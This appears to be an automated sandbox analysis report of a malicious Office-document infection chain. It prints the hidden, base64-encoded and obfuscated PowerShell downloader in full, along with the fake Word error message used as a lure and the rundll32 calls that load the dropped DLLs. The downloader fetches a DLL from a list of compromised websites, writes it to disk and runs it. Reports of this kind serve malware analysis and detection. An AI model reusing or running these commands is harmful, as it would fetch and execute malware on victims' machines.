Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2183555310.0000000000660000.00000004.00000020.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,

24_2_10004560

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]

7_2_10001D4D

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAM